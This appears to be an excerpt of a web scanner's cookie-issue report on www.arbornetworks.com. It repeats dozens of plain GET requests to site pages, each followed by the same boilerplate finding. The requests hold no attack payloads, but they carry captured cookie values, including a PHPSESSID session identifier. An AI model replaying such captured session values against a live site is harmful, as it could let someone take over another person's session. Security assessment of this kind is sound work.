GET /en/com-5fcontent/view-2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/com-5fcontent/view-3.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/contact-us-4.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/contact-us.html HTTP/1.1 Host: www.arbornetworks.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=aed38ed91c928cbeafc242634170f7eb; e585cbcac8f7bba066a55f149566ddd5=-; __utmz=186398841.1296696461.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/32; e411486dda3a9a212ec0bba8fd7ed343=5e36548abe003c359e3e6d61a215e937; mbfcookie[lang]=en; __utma=186398841.1861161794.1296689848.1296689848.1296696461.2; __utmc=186398841; __utmb=186398841.2.10.1296696461
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/customer-solution-briefs.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/fingerprint-sharing-alliance-defending-against-network-attacks-2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/ipv6-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/meet-our-partners.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/network-monitoring-security-news-events.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/network-security-experts-2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/network-security-monitoring-solutions-for-your-industry.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/network-security-research-2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/network-security-visibility-products-235.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/network-solutions-we-provide.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/news-events.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/partnership-inquiry-form.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/services-network-support-maintenance-training-2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/solution-partners-4.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/solutions-for-places-in-your-network.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/solutions-for-your-business-needs.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/technology-partners-4.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/what-we-do-network-security-solutions-services.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/white-papers-global-network-security-topics-2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /es/5.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /es/infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /fr/4.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /fr/infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /index.php?lang=en HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /it HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /it/infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /jp/2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /jp/infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /kr/2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /kr/network-infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /privacy_policy.php HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/lost-password-3.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/partner-portal-home.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
